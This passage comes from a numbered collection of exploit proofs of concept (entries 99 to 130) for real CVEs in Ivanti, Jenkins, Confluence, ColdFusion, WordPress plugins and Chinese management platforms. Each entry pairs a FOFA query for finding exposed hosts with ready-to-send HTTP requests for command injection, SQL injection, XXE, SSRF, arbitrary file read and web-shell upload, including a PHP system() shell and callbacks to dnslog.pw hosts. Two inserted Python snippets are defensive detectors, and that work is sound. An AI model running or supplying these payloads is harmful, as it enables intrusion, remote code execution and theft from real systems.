id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast Yingkeshi HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the XML document below:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

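The SAMLRequest in entry 103 is nothing more than base64 over an XML document that declares an external parameter entity. The gate below is an added example written from the defender's side; it is not part of the original list and not code from Ivanti or any other vendor. It decodes the parameter and refuses any document carrying a DTD or entity declaration before an XML parser ever sees it. The two sample documents and the attacker.example host are constructed for the demonstration.

```python
import base64
import binascii
import re

# A SAML AuthnRequest never needs a DTD. Any DOCTYPE or ENTITY declaration in
# the decoded document is grounds for rejection before it reaches a parser.
_DTD_MARKERS = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)


def decode_saml_request(param):
    """Strict base64 decode of an HTTP-POST binding value; None if malformed.

    The HTTP-Redirect binding additionally DEFLATEs the XML before base64;
    that variant is not handled here.
    """
    try:
        return base64.b64decode(param, validate=True)
    except (binascii.Error, ValueError):
        return None


def inspect_saml_request(param):
    """Classify a SAMLRequest value: 'allow', 'reject-dtd' or 'reject-malformed'."""
    xml = decode_saml_request(param)
    if xml is None:
        return "reject-malformed"
    if _DTD_MARKERS.search(xml):
        return "reject-dtd"
    return "allow"


# Constructed samples, not captured from any real deployment.
BENIGN_XML = (
    b'<?xml version="1.0"?>'
    b'<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
    b'ID="_c1" Version="2.0" IssueInstant="2024-01-01T00:00:00Z"/>'
)
XXE_XML = (
    b'<?xml version="1.0" ?>'
    b'<!DOCTYPE root [<!ENTITY % ext SYSTEM "http://attacker.example/x"> %ext;]>'
    b'<r></r>'
)


def samples():
    """Return {name: SAMLRequest value} for the three cases the gate must handle."""
    return {
        "benign": base64.b64encode(BENIGN_XML).decode("ascii"),
        "xxe": base64.b64encode(XXE_XML).decode("ascii"),
        "garbage": "not*base64*",
    }


if __name__ == "__main__":
    for name, value in samples().items():
        print(f"{name}: {inspect_saml_request(value)}")
```

Documents that pass the gate should still be parsed with entity expansion and external DTD loading disabled (defusedxml, or the equivalent parser flags in other languages); the marker scan is a cheap first line, not a substitute. Rejections are worth logging with the source address, since a DOCTYPE in a SAML request is a strong signal on its own.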
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: replace with your own token
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

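Entries 105 to 117 share a few recognisable shapes on the wire: updatexml() error-based injection (105 to 107), time-based SLEEP() probes (111, 112, 114, 117), the file:/// wrapper of entry 113, and the Jenkins CLI endpoint of entry 109. The scanner below is an added example for defenders and is not from the original post: it parses combined-format access log lines, percent-decodes the request path (up to three rounds, so double encoding is caught), and reports which of those signatures each request matches. The log lines are constructed; the paths in them are modelled on the requests in this section.

```python
import re
from urllib.parse import unquote_plus

# Combined log format (Apache/nginx): ip - user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures drawn from the requests in this section: a name and the lowercase
# substring that must appear in the decoded request path.
SIGNATURES = [
    ("sqli-updatexml", "updatexml("),        # entries 105-107
    ("sqli-time-based", "sleep("),           # entries 111, 112, 114, 117
    ("file-read-wrapper", "file:///"),       # entry 113
    ("jenkins-cli", "/cli?remoting=false"),  # entry 109
]


def normalize(path):
    """Percent-decode repeatedly (so %2528 -> %28 -> '(' is caught), turn '+'
    into spaces, collapse whitespace and lowercase."""
    cur = path
    for _ in range(3):
        nxt = unquote_plus(cur)
        if nxt == cur:
            break
        cur = nxt
    return re.sub(r"\s+", " ", cur).lower()


def classify(path):
    """Return the list of signature names matching one request path."""
    norm = normalize(path)
    return [name for name, needle in SIGNATURES if needle in norm]


def scan(lines):
    """Parse log lines and return (ip, method, path, [signatures]) for each hit."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        hits = classify(m["path"])
        if hits:
            findings.append((m["ip"], m["method"], m["path"], hits))
    return findings


# Constructed log lines modelled on the requests in entries 106, 109, 111 and 113.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jun/2024:10:00:01 +0800] "GET /index.php?page=2 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [05/Jun/2024:10:00:02 +0800] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 312',
    '10.0.0.9 - - [05/Jun/2024:10:00:09 +0800] "GET /?rest_route=/h5vp/v1/view/1&id=1\'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 88',
    '10.0.0.9 - - [05/Jun/2024:10:00:10 +0800] "GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" 200 1843',
    '10.0.0.9 - - [05/Jun/2024:10:00:11 +0800] "POST /cli?remoting=false HTTP/1.1" 200 0',
]


if __name__ == "__main__":
    for ip, method, path, hits in scan(SAMPLE_LOG):
        print(f"{ip} {method} {path[:60]} -> {', '.join(hits)}")
```

Substring signatures are a triage tool, not a verdict: "sleep(" can occur in legitimate parameters, and POST bodies (entries 112 and 119 carry the injection there) are not in an access log at all. Pair hits with response time and status, and treat the Jenkins CLI endpoint as notable only where the CLI is not meant to be exposed.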
118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default username/password is admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328


boot/web/upload/weblogo/1.php

122. Beijing Byzoro Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan Engineering Quality Inspection System arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affects Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
